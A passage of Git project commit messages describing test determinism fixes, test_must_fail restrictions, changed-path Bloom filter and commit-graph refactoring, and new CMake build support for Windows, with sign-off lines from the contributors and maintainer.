Side note: I am not interested in supporting multi-line reflog
messages right at the moment (nobody is asking for it), but I
envision that instead of the "squash a run of whitespaces into a SP
and rtrim" cleansing, we can %urlencode problematic bytes in the
message *AND* append a SP at the end, when a new version of Git that
supports multi-line and/or verbatim reflog messages writes a reflog
record. The reading side can detect the presense of SP at the end
(which should have been rtrimmed out if it were written by existing
versions of Git) as a signal that decoding %urlencode recovers the
original reflog message.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both the git-bisect.sh as bisect--helper inspected the file system
directly.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Adding tests for refs pointing to tree and blob shows that
we care about testing both positive ("see, my shiny new toy
does work") and negative ("and it won't do nonsensical
things when given an input it is not designed to work with")
cases.
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Let's avoid a big dense paragraph by using an unordered
list for the %(contents:XXXX) format specifiers.
While at it let's also make the following improvements:
- Let's not describe %(contents) using "complete message"
as it's not clear what an incomplete message is.
- Let's improve how the "subject" and "body" are
described.
- Let's state that "signature" is only available for
tag objects.
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test for "no shallow lines after receiving ACK ready" is very
sensitive to the timestamps of the commits we create. It's looking for
the fetch negotiation to send a "ready", which in turn depends on the
order in which we traverse commits during the negotiation.
It works reliably now because the base commit "7" is created without
test_commit, and thus gets a commit time matching the current system
clock. Whereas the new commits created in this test do use test_commit,
and get the usual test_tick time from 2005. So the fetch into the
"clone" repository results in a commit graph like this (I omitted some
of the "unrelated" commits for clarity; they're all just a sequence of
test_ticks):
$ git log --graph --format='%ct %s %d'
* 1112912953 new (origin/master, origin/HEAD)
* 1594322236 7 (grafted, master)
* 1112912893 unrelated15 (origin/unrelated15, unrelated15)
[...]
* 1112912053 unrelated1 (origin/unrelated1, unrelated1)
* 1112911993 new-too (HEAD -> newnew, tag: new-too)
The important things to see are:
- "7" is way in the future compared to the other commits
- "new-too" in the fetching repo is older than "new" (and its
"unrelated" ancestors) in the shallow repo
If we change our "setup shallow clone" step to use test_tick, too (and
get rid of the dependency on the system clock), then the test will fail.
The resulting graph looks like this:
$ git log --graph --format='%ct %s %d'
* 1112913373 new (origin/master, origin/HEAD)
* 1112912353 7 (grafted, master)
* 1112913313 unrelated15 (origin/unrelated15, unrelated15)
[...]
* 1112912473 unrelated1 (origin/unrelated1, unrelated1)
* 1112912413 new-too (HEAD -> newnew, tag: new-too)
Our "new-too" is still older than "new" and "unrelated", but now "7" is
older than all of them (because it advanced test_tick, which the other
tests built on top of). In the original, we advertised "7" as the first
"have" before anything else, but now "new-too" is more recent. You'd see
the same thing in the unlikely event that the system clock was set
before our test_tick default in 2005.
Let's make the timing requirements more explicit. The important thing is
that the client advertise all of its shared commits first, before
presenting its unique "new-too" commit. We can do that and get rid of
the system clock dependency at the same time by creating all of the
shared commits around time X (using test_tick), and then creating
"new-too" with some time long before X. The resulting graph looks like
this:
$ git log --graph --format='%ct %s %d'
* 1500001380 new (origin/master, origin/HEAD)
* 1500000420 7 (grafted, master)
* 1500001320 unrelated15 (origin/unrelated15, unrelated15)
[...]
* 1500000480 unrelated1 (origin/unrelated1, unrelated1)
* 1400000060 new-too (HEAD -> newnew, tag: new-too)
That also lets us get rid of the hacky test_tick added by f0e802ca20
(t5539: update a flaky test, 2014-07-14). That was clearly dancing
around the same problem, but only addressed the relationship between
commits created in the two subshells (which did use test_tick, but
overlapped because increments of test_tick in subshells are lost). Now
that we're using consistent and well-placed times for both lines of
history, we don't have to care about a one-tick difference between the
two sides.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A few of the perl tests in t9700 ask for the author and committer ident,
and then make sure we get something sensible. For the timestamp portion,
we just match [0-9]+, because the actual value will depend on when the
test is run. However, we do require that the timezone be "+0000". This
works reliably because we set $TZ in test-lib.sh. But in preparation for
changing the default timezone, let's be a bit more flexible. We don't
actually care about the exact value here, just that we were able to get
a sensible output from the perl module's access methods.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When using git clone with --separate-git-dir realgitdir and
realgitdir already exists, it's content is destroyed.
So, make sure we don't clone into an existing non-empty directory.
When d45420c1 (clone: do not clean up directories we didn't create,
2018-01-02) tightened the clean-up procedure after a failed cloning
into an empty directory, it assumed that the existing directory
given is an empty one so it is OK to keep that directory, while
running the clean-up procedure that is designed to remove everything
in it (since there won't be any, anyway). Check and make sure that
the $GIT_DIR is empty even cloning into an existing repository.
Signed-off-by: Ben Wijen <ben@wijen.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The `git log` synopsis mentions `<revision range>`, and the description
of this option links to gitrevisions(7), but a nice explanation of
how a revision range can be constructed from individual commits,
optionnally prefixed with `^`, also exists in `rev-list-description.txt`.
Include this description in the man page for `git log`.
Add Asciidoc 'ifdef's to `rev-list-description.txt` so that either `git
rev-list` or `git log` appears in the respective man pages.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A following commit will reuse the description of the `git rev-list`
command in the `git log` manpage.
Move this description to a separate file.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Using '{caret}' inside double quotes and immediately following with a
single quoted word does not create the desired output: '<commit1>'
appears verbatim instead of being emphasized.
Use a litteral caret ('^') instead.
Also, remove the leading tabs in shell examples to bring them more in
line with the rest of the documentation.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "Specifying ranges" section does not mention explicitly that
several commits can be specified to form a range.
Add a mention to that effect.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add links to the documentation for `git rev-list` and `git diff`
instead of simply mentioning them, to make it easier for readers to reach
these documentation pages. Let's link to `git diff` as this is the
porcelain command, and the rest of the family (`diff-index`, `diff-tree` and
`diff-files`) are mentioned in the "Raw output format" section of the
`git diff` documentation.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The first two commits created in t6000 are done without test_tick,
meaning they use the current system clock. After that, we create one
with test_tick, which means it uses a deterministic time in the past.
The result of the "symleft flag bit is propagated down from tag" test
relies on the output order of commits from git-log, which in turn
depends on these timestamps. So this test is technically dependent on
the system clock time, though in practice it would only matter if your
system clock was set before test_tick's default time (which is in 2005).
However, let's use test_tick consistently for those early commits (and
update the expected output to match). This makes the test deterministic,
which is in turn easier to reason about and debug.
Note that there's also a fourth commit here, and it does not use
test_tick. It does have a deterministic timestamp because of the prior
use of test_tick in the script, but it will always be the same time as
the third commit. Let's use test_tick here, too, for consistency. The
matching timestamps between the third and fourth commit are not an
important part of the test.
We could also use test_commit in all of these cases, as it runs
test_tick under the hood. But it would be awkward to do so, as these
tests diverge from the usual test_commit patterns (e.g., by creating
multiple files in a single commit).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In previous commits, we removed the usage of test_must_fail() for most
commands except for a set of pre-approved commands. Since that's done,
only allow test_must_fail() to run those pre-approved commands.
Obviously, we should allow `git`.
We allow `__git*` as some completion functions return an error code that
comes from a git invocation. It's good to avoid using test_must_fail
unnecessarily but it wouldn't hurt to err on the side of caution when
we're potentially wrapping a git command (like in these cases).
We also allow `test-tool` and `test-svn-fe` because these are helper
commands that are written by us and we want to catch their failure.
Finally, we allow `test_terminal` because `test_terminal` just wraps
around git commands. Also, we cannot rewrite
`test_must_fail test_terminal` as `test_terminal test_must_fail` because
test_must_fail() is a shell function and as a result, it cannot be
invoked from the test-terminal Perl script.
We opted to explicitly list the above tools instead of using a catch-all
such as `test[-_]*` because we want to be as restrictive as possible so
that in the future, someone would not accidentally introduce an
unrelated usage of test_must_fail() on an "unapproved" command.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are using `test_must_fail cvs` to test that the cvs command fails as
expected. However, test_must_fail() is used to ensure that commands fail
in an expected way, not due to something like a segv. Since we are not
in the business of verifying the sanity of the external world, replace
`test_must_fail cvs` with `! cvs` and assume that the cvs command does
not die unexpectedly.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test_must_fail() family of functions (including test_might_fail())
should only be used on git commands. Replace test_might_fail() with
a compound command wrapping the old p4 invocation that always returns 0.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We had a `test_must_fail verify_expect`. However, the git command in
verify_expect() was not expected to fail; the test_cmp() was the failing
command. Be more precise about testing failure by accepting an optional
first argument of '!' which causes the result of the file comparison to
be negated.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the future, we plan on only allowing `test_might_fail` to work on a
restricted subset of commands, including `git`. Reorder the commands so
that `run_with_limited_open_files` comes before `test_might_fail`. This
way, `test_might_fail` operates on a git command.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future patch, we plan on making the test_must_fail()-family of
functions accept only git commands. Even though force_color() wraps an
invocation of `env git`, test_must_fail() will not be able to figure
this out since it will assume that force_color() is just some random
function which is disallowed.
Instead of using `env` in force_color() (which does not support shell
functions), export the environment variables in a subshell. Write the
invocation as `force_color test_must_fail git ...` since shell functions
are now supported.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The file 'dir/subdir/file' can only be modified if its leading
directories 'dir' and 'dir/subdir' are modified as well.
So when checking modified path Bloom filters looking for commits
modifying a path with multiple path components, then check not only
the full path in the Bloom filters, but all its leading directories as
well. Take care to check these paths in "deepest first" order,
because it's the full path that is least likely to be modified, and
the Bloom filter queries can short circuit sooner.
This can significantly reduce the average false positive rate, by
about an order of magnitude or three(!), and can further speed up
pathspec-limited revision walks. The table below compares the average
false positive rate and runtime of
git rev-list HEAD -- "$path"
before and after this change for 5000+ randomly* selected paths from
each repository:
Average false Average Average
positive rate runtime runtime
before after before after difference
------------------------------------------------------------------
git 3.220% 0.7853% 0.0558s 0.0387s -30.6%
linux 2.453% 0.0296% 0.1046s 0.0766s -26.8%
tensorflow 2.536% 0.6977% 0.0594s 0.0420s -29.2%
*Path selection was done with the following pipeline:
git ls-tree -r --name-only HEAD | sort -R | head -n 5000
The improvements in runtime are much smaller than the improvements in
average false positive rate, as we are clearly reaching diminishing
returns here. However, all these timings depend on that accessing
tree objects is reasonably fast (warm caches). If we had a partial
clone and the tree objects had to be fetched from a promisor remote,
e.g.:
$ git clone --filter=tree:0 --bare file://.../webkit.git webkit.notrees.git
$ git -C webkit.git -c core.modifiedPathBloomFilters=1 \
commit-graph write --reachable
$ cp webkit.git/objects/info/commit-graph webkit.notrees.git/objects/info/
$ git -C webkit.notrees.git -c core.modifiedPathBloomFilters=1 \
rev-list HEAD -- "$path"
then checking all leading path component can reduce the runtime from
over an hour to a few seconds (and this is with the clone and the
promisor on the same machine).
This adjusts the tracing values in t4216-log-bloom.sh, which provides a
concrete way to notice the improvement.
Helped-by: Taylor Blau <me@ttaylorr.com>
Helped-by: René Scharfe <l.s.r@web.de>
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The prepare_to_use_bloom_filter() method was not intended to be called
on an empty pathspec. However, 'git log -- .' and 'git log' are subtly
different: the latter reports all commits while the former will simplify
commits that do not change the root tree.
This means that the path used to construct the bloom_key might be empty,
and that value is not added to the Bloom filter during construction.
That means that the results are likely incorrect!
To resolve the issue, be careful about the length of the path and stop
filling Bloom filters. To be completely sure we do not use them, drop
the pointer to the bloom_filter_settings from the commit-graph. That
allows our test to look at the trace2 logs to verify no Bloom filter
statistics are reported.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In my experience while experimenting with new commit-graph chunks,
early versions of the corresponding new write_commit_graph_my_chunk()
functions are, sadly but not surprisingly, often buggy, and write more
or less data than they are supposed to, especially if the chunk size
is not directly proportional to the number of commits. This then
causes all kinds of issues when reading such a bogus commit-graph
file, raising the question of whether the writing or the reading part
happens to be buggy this time.
Let's catch such issues early, already when writing the commit-graph
file, and check that each write_graph_chunk_*() function wrote the
amount of data that it was expected to, and what has been encoded in
the Chunk Lookup table. Now that all commit-graph chunks are written
in a loop we can do this check in a single place for all chunks, and
any chunks added in the future will get checked as well.
Helped-by: René Scharfe <l.s.r@web.de>
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In write_commit_graph_file() we now have one block of code filling the
array of 'struct chunk_info' with the IDs and sizes of chunks to be
written, and an other block of code calling the functions responsible
for writing individual chunks. In case of optional chunks like Extra
Edge List an Base Graphs List there is also a condition checking
whether that chunk is necessary/desired, and that same condition is
repeated in both blocks of code. Other, newer chunks have similar
optional conditions.
Eliminate these repeated conditions by storing the function pointers
responsible for writing individual chunks in the 'struct chunk_info'
array as well, and calling them in a loop to write the commit-graph
file. This will open up the possibility for a bit of foolproofing in
the following patch.
Helped-by: René Scharfe <l.s.r@web.de>
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update the write_graph_chunk_*() helper functions to have the same
signature:
- Return an int error code from all these functions.
write_graph_chunk_base() already has an int error code, now the
others will have one, too, but since they don't indicate any
error, they will always return 0.
- Drop the hash size parameter of write_graph_chunk_oids() and
write_graph_chunk_data(); its value can be read directly from
'the_hash_algo' inside these functions as well.
This opens up the possibility for further cleanups and foolproofing in
the following two patches.
Helped-by: René Scharfe <l.s.r@web.de>
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The changed-path Bloom filters were released in v2.27.0, but have a
significant drawback. A user can opt-in to writing the changed-path
filters using the "--changed-paths" option to "git commit-graph write"
but the next write will drop the filters unless that option is
specified.
This becomes even more important when considering the interaction with
gc.writeCommitGraph (on by default) or fetch.writeCommitGraph (part of
features.experimental). These config options trigger commit-graph writes
that the user did not signal, and hence there is no --changed-paths
option available.
Allow a user that opts-in to the changed-path filters to persist the
property of "my commit-graph has changed-path filters" automatically. A
user can drop filters using the --no-changed-paths option.
In the process, we need to be extremely careful to match the Bloom
filter settings as specified by the commit-graph. This will allow future
versions of Git to customize these settings, and the version with this
change will persist those settings as commit-graphs are rewritten on
top.
Use the trace2 API to signal the settings used during the write, and
check that output in a test after manually adjusting the correct bytes
in the commit-graph file.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The get_bloom_filter() method is a bit complicated in some parts where
it does not need to be. In particular, it needs to return a NULL filter
only when compute_if_not_present is zero AND the filter data cannot be
loaded from a commit-graph file. This currently happens by accident
because the commit-graph does not load changed-path Bloom filters from
an existing commit-graph when writing a new one. This will change in a
later patch.
Also clean up some style issues while we are here.
One side-effect of returning a NULL filter is that the filters that are
reported as "too large" will now be reported as NULL insead of length
zero. This case was not properly covered before, so add a test. Further,
remote the counting of the zero-length filters from revision.c and the
trace2 logs.
Helped-by: René Scharfe <l.s.r@web.de>
Helped-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach .github/workflows/main.yml to use CMake for VS builds.
Modified the vs-test step to match windows-test step. This speeds
up the vs-test. Calling git-cmd from powershell and then calling git-bash
to perform the tests slows things down(factor of about 6). So git-bash
is directly called from powershell to perform the tests using prove.
NOTE: Since GitHub keeps the same directory for each job
(with respect to path) absolute paths are used in the bin-wrapper
scripts.
GitHub has switched to CMake 3.17.1 which changed the behaviour of
FindCURL module. An extra definition (-DCURL_NO_CURL_CMAKE=ON) has been
added to revert to the old behaviour.
In the configuration phase CMake looks for the required libraries for
building git (eg zlib,libiconv). So we extract the libraries before we
configure.
To check for ICONV_OMITS_BOM libiconv.dll needs to be in the working
directory of script or path. So we copy the dlls before we configure.
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch adds support for Visual Studio and Clang builds
The minimum required version of CMake is upgraded to 3.15 because
this version offers proper support for Clang builds on Windows.
Libintl is not searched for when building with Visual Studio or Clang
because there is no binary compatible version available yet.
NOTE: In the link options invalidcontinue.obj has to be included.
The reason for this is because by default, Windows calls abort()'s
instead of setting errno=EINVAL when invalid arguments are passed to
standard functions.
This commit explains it in detail:
4b623d80f7
On Windows the default generator is Visual Studio,so for Visual Studio
builds do this:
cmake `relative-path-to-srcdir`
NOTE: Visual Studio generator is a multi config generator, which means
that Debug and Release builds can be done on the same build directory.
For Clang builds do this:
On bash
CC=clang cmake `relative-path-to-srcdir` -G Ninja
-DCMAKE_BUILD_TYPE=[Debug or Release]
On cmd
set CC=Clang
cmake `relative-path-to-srcdir` -G Ninja
-DCMAKE_BUILD_TYPE=[Debug or Release]
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch facilitates building git on Windows with CMake using MinGW
NOTE: The funtions unsetenv and hstrerror are not checked in Windows
builds.
Reasons
NO_UNSETENV is not compatible with Windows builds.
lines 262-264 compat/mingw.h
compat/mingw.h(line 25) provides a definition of hstrerror which
conflicts with the definition provided in
git-compat-util.h(lines 733-736).
To use CMake on Windows with MinGW do this:
cmake `relative-path-to-srcdir` -G "MinGW Makefiles"
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch allows git to be tested when performin out of source builds.
This involves changing GIT_BUILD_DIR in t/test-lib.sh to point to the
build directory. Also some miscellaneous copies from the source directory
to the build directory.
The copies are:
t/chainlint.sed needed by a bunch of test scripts
po/is.po needed by t0204-gettext-rencode-sanity
mergetools/tkdiff needed by t7800-difftool
contrib/completion/git-prompt.sh needed by t9903-bash-prompt
contrib/completion/git-completion.bash needed by t9902-completion
contrib/svn-fe/svnrdump_sim.py needed by t9020-remote-svn
NOTE: t/test-lib.sh is only modified when tests are run not during
the build or configure.
The trash directory is still srcdir/t
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch provides an alternate way to test git using ctest.
CTest ships with CMake, so there is no additional dependency being
introduced.
To perform the tests with ctest do this after building:
ctest -j[number of jobs]
NOTE: -j is optional, the default number of jobs is 1
Each of the jobs does this:
cd t/ && sh t[something].sh
The reason for using CTest is that it logs the output of the tests
in a neat way, which can be helpful during diagnosis of failures.
After the tests have run ctest generates three log files located in
`build-directory`/Testing/Temporary/
These log files are:
CTestCostData.txt:
This file contains the time taken to complete each test.
LastTestsFailed.log:
This log file contains the names of the tests that have failed in the
run.
LastTest.log:
This log file contains the log of all the tests that have run.
A snippet of the file is given below.
10/901 Testing: D:/my/git-master/t/t0009-prio-queue.sh
10/901 Test: D:/my/git-master/t/t0009-prio-queue.sh
Command: "sh.exe" "D:/my/git-master/t/t0009-prio-queue.sh"
Directory: D:/my/git-master/t
"D:/my/git-master/t/t0009-prio-queue.sh"
Output:
----------------------------------------------------------
ok 1 - basic ordering
ok 2 - mixed put and get
ok 3 - notice empty queue
ok 4 - stack order
passed all 4 test(s)
1..4
<end of output>
Test time = 1.11 sec
NOTE: Testing only works when building in source for now.
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Install the built binaries and scripts using CMake
This is very similar to `make install`.
By default the destination directory(DESTDIR) is /usr/local/ on Linux
To set a custom installation path do this:
cmake `relative-path-to-srcdir`
-DCMAKE_INSTALL_PREFIX=`preferred-install-path`
Then run `make install`
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement the placeholder substitution to generate scripted
Porcelain commands, e.g. git-request-pull out of
git-request-pull.sh
Generate shell/perl/python scripts and template using CMake instead of
using sed like the build procedure in the Makefile does.
The text translations are only build if `msgfmt` is found in your path.
NOTE: The scripts and templates are generated during configuration.
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In show_submodule_header(), we gather the left and right commits
of the submodule repository, as well as the merge bases. However,
prepare_submodule_summary() initializes the rev_info with the_repository,
so we end up parsing the commit in the wrong repository.
This results in a fatal error in parse_commit_in_graph(), since the
passed item does not belong to the repository's commit graph.
Signed-off-by: Michael Forney <mforney@mforney.org>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is needed when repo_init_revisions() is called with a repository
that is not the_repository to ensure appropriate repository is used
in repo_parse_commit_internal(). If the wrong repository is used,
a fatal error is the commit-graph machinery occurs:
fatal: invalid commit position. commit-graph is likely corrupt
Since revision.c was the only user of the parse_commit_gently
compatibility define, remove it from commit.h.
Signed-off-by: Michael Forney <mforney@mforney.org>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
43d3561 (commit-graph write: don't die if the existing graph is corrupt,
2019-03-25) introduced the GIT_TEST_COMMIT_GRAPH_DIE_ON_LOAD environment
variable. This was created to verify that commit-graph was not loaded
when writing a new non-incremental commit-graph.
An upcoming change wants to load a commit-graph in some valuable cases,
but we want to maintain that we don't trust the commit-graph data when
writing our new file. Instead of dying on load, instead die if we ever
try to parse a commit from the commit-graph. This functionally verifies
the same intended behavior, but allows a more advanced feature in the
next change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Place an instance of struct bloom_settings into the struct
write_commit_graph_context. This allows simplifying the function
prototype of write_graph_chunk_bloom_data(). This will allow us
to combine the function prototypes and use function pointers to
simplify write_commit_graph_file().
By using a pointer, we can later replace the settings to match those
that exist in the current commit-graph, in case a future Git version
allows customization of these parameters.
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
At the moment, the recommended way to configure Git's builds is to
simply run `make`. If that does not work, the recommended strategy is to
look at the top of the `Makefile` to see whether any "Makefile knob" has
to be turned on/off, e.g. `make NO_OPENSSL=YesPlease`.
Alternatively, Git also has an `autoconf` setup which allows configuring
builds via `./configure [<option>...]`.
Both of these options are fine if the developer works on Unix or Linux.
But on Windows, we have to jump through hoops to configure a build
(read: we force the user to install a full Git for Windows SDK, which
occupies around two gigabytes (!) on disk and downloads about three
quarters of a gigabyte worth of Git objects).
The build infrastructure for Git is written around being able to run
make, which is not supported natively on Windows.
To help Windows developers a CMake build script is introduced here.
With a working support CMake, developers on Windows need only install
CMake, configure their build, load the generated Visual Studio solution
and immediately start modifying the code and build their own version of
Git. Likewise, developers on other platforms can use the convenient GUI
tools provided by CMake to configure their build.
So let's start building CMake support for Git.
This is only the first step, and to make it easier to review, it only
allows for configuring builds on the platform that is easiest to
configure for: Linux.
The CMake script checks whether the headers are present(eg. libgen.h),
whether the functions are present(eg. memmem), whether the funtions work
properly (eg. snprintf) and generate the required compile definitions
for the platform. The script also searches for the required libraries,
if it fails to find the required libraries the respective executables
won't be built.(eg. If libcurl is not found then git-remote-http won't
be built). This will help building Git easier.
With a CMake script an out of source build of git is possible resulting
in a clean source tree.
Note: this patch asks for the minimum version v3.14 of CMake (which is
not all that old as of time of writing) because that is the first
version to offer a platform-independent way to generate hardlinks as
part of the build. This is needed to generate all those hardlinks for
the built-in commands of Git.
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Unify the 'chunk_ids' and 'chunk_sizes' arrays into an array of
'struct chunk_info'. This will allow more cleanups in the following
patches.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In write_commit_graph_file() one block of code fills the array of
chunk IDs, another block of code fills the array of chunk offsets,
then the chunk IDs and offsets are written to the Chunk Lookup table,
and finally a third block of code writes the actual chunks. In case
of optional chunks like Extra Edge List and Base Graphs List there is
also a condition checking whether that chunk is necessary/desired, and
that same condition is repeated in all those three blocks of code.
This patch series is about to add more optional chunks, so there would
be even more repeated conditions.
Those chunk offsets are relative to the beginning of the file, so they
inherently depend on the size of the Chunk Lookup table, which in turn
depends on the number of chunks that are to be written to the
commit-graph file. IOW at the time we set the first chunk's ID we
can't yet know its offset, because we don't yet know how many chunks
there are.
Simplify this by initially filling an array of chunk sizes, not
offsets, and calculate the offsets based on the chunk sizes only
later, while we are writing the Chunk Lookup table. This way we can
fill the arrays of chunk IDs and sizes in one go, eliminating one set
of repeated conditions.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Chunk Lookup table stores the chunks' starting offset in the
commit-graph file, not their sizes. Consequently, the size of a chunk
can only be calculated by subtracting its offset from the offset of
the subsequent chunk (or that of the terminating label). This is
currenly implemented in a bit complicated way: as we iterate over the
entries of the Chunk Lookup table, we check the id of each chunk and
store its starting offset, then we check the id of the last seen chunk
and calculate its size using its previously saved offset. At the
moment there is only one chunk for which we calculate its size, but
this patch series will add more, and the repeated chunk id checks are
not that pretty.
Instead let's read ahead the offset of the next chunk on each
iteration, so we can calculate the size of each chunk right away,
right where we store its starting offset.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While we iterate over all entries of the Chunk Lookup table we make
sure that we don't attempt to read past the end of the mmap-ed
commit-graph file, and check in each iteration that the chunk ID and
offset we are about to read is still within the mmap-ed memory region.
However, these checks in each iteration are not really necessary,
because the number of chunks in the commit-graph file is already known
before this loop from the just parsed commit-graph header.
So let's check that the commit-graph file is large enough for all
entries in the Chunk Lookup table before we start iterating over those
entries, and drop those per-iteration checks. While at it, take into
account the size of everything that is necessary to have a valid
commit-graph file, i.e. the size of the header, the size of the
mandatory OID Fanout chunk, and the size of the signature in the
trailer as well.
Note that this necessitates the change of the error message as well,
and, consequently, have to update the 'detect incorrect chunk count'
test in 't5318-commit-graph.sh' as well.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our CodingGuidelines says that it's sufficient to include one of
'git-compat-util.h' and 'cache.h', but both 'commit-graph.c' and
'commit-graph.h' include both. Let's include only 'git-compat-util.h'
to loose a bunch of unnecessary dependencies; but include 'hash.h',
because 'commit-graph.h' does require the definition of 'struct
object_id'.
'commit-graph.h' explicitly includes 'repository.h' and
'string-list.h', but only needs the declaration of a few structs from
them. Drop these includes and forward-declare the necessary structs
instead.
'commit-graph.c' includes 'dir.h', but doesn't actually use anything
from there, so let's drop that #include as well.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
ll_diff_tree_oid() has only ever returned 0 [1], so it's return value
is basically useless. It's only caller diff_tree_oid() has only ever
returned the return value of ll_diff_tree_oid() as-is [2], so its
return value is just as useless. Most of diff_tree_oid()'s callers
simply ignore its return value, except:
- diff_root_tree_oid() is a thin wrapper around diff_tree_oid() and
returns with its return value, but all of diff_root_tree_oid()'s
callers ignore its return value.
- rev_compare_tree() and rev_same_tree_as_empty() do look at the
return value in a condition, but, since the return value is always
0, the former's < 0 condition is never fulfilled, while the
latter's >= 0 condition is always fulfilled.
So let's drop the return value of ll_diff_tree_oid(), diff_tree_oid()
and diff_root_tree_oid(), and drop those conditions from
rev_compare_tree() and rev_same_tree_as_empty() as well.
[1] ll_diff_tree_oid() and its ancestors have been returning only 0
ever since it was introduced as diff_tree() in 9174026cfe (Add
"diff-tree" program to show which files have changed between two
trees., 2005-04-09).
[2] diff_tree_oid() traces back to diff-tree.c:main() in 9174026cfe as
well.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
clear_##slabname() frees only the memory allocated for a commit slab
itself, but entries in the commit slab might own additional memory
outside the slab that should be freed as well. We already have (at
least) one such commit slab, and this patch series is about to add one
more.
To free all additional memory owned by entries on the commit slab the
user of such a slab could iterate over all commits it knows about,
peek whether there is a valid entry associated with each commit, and
free the additional memory, if any. Or it could rely on intimate
